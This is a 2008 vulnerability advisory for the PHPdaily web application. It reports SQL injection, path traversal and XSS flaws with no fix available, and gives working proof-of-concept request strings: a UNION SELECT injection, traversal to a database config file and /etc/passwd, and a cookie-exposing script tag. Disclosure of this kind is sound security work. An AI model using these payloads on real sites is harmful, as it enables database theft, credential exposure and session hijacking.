_____________________________________________________________________________________________________| | | / / .: PHPdaily Multiple Remote Vulnerabilities (SQL-INJ,XSS,Local File Download Vulnerability):. | | |/ /______________________________________________________________________________________________________| | v / Discoverd By: 0xFFFFFF . Main THX: ALLAH | | / Home: www.white-hacker.com . Greetz To: All Hackers & WHITE-HACKER Team | | / Mail: admin(at)white-hacker[dot]com . | |/ Country: Algeria . | v___________________________________________________________________________________________________________| | Publication info :. | |___________________________________________________________________________________________________________| | Date: 23-10-2008 . Method : [*] GET [ ] POST | | Content: Vulnerability . Register Globals : [ ] ON [*] OFF | | Type: SQL-INJ,XSS,LFD . Magic quotes : [*] ON [ ] OFF | | Application: PHPdaily . Risk: [*] High [ ] medium [ ] Low | | Venedor site: http://phpdaily.self-reliance.be/ . | | Version: N/A . | | -------------------------------------------------- . | | Impact: Exploring Database . | | Run unauthorized JavaScript . | | Local File Download . | | -------------------------------------------------- . | | Exploit: Available . | | Fix: N/A . | |___________________________________________________________________________________________________________| | Description :. | |___________________________________________________________________________________________________________| | | | After a quick audit, I have noticed that PHPdaily is a very weak script which contains many types of | | vulnerabilities. | | | | Inputs "id,prev" passed into add_postit.php,delete.php,prest_detail.php,mod_prest_date.php pages are not | | properly verified, a simple user can easily get sensitive information from the database by injecting | | SQL Queries. | | | | Also through "download_file.php" page via the input "fichierwe" any user can download any local file. | | Furthermore, through "add_prest_date.php" page there is the ability of XSS. | | | | ......................................................................................................... | | | | Requirement | | You have to connect as a simple user | | | | 1. SQL injection Exploit : | | [Site]add_postit.php?mode=rep&id=-1+union+select+1,2,3,version(),5,6,7,8# | | [Site]delete.php?prev=accueil&mode=postit&id=[SQL-INJ] (-1+union+select+[17 Columns]) | | [Site]prest_detail.php?prev=[SQL-INJ] | | [Site]mod_prest_date.php?prev=list&id=[SQL-INJ] | | | | 2. Local File Download Exploit : | | [Site]download_file.php?fichier=../include/connect.php | | [Site]download_file.php?fichier=../../../../../../etc/passwd | | | | 3. XSS Exploit: | | [Site]add_prest_date.php?date="><script>alert(document.cookie)</script> | |___________________________________________________________________________________________________________| | Notice :. | |___________________________________________________________________________________________________________| | These publications are published for educational purpose thus the author will be not responsible | | for any damage. | |___________________________________________________________________________________________________________| \ &#169; WHITE-HACKER All contents &#169; 2008. All rights reserved. | \____________________________________________________________|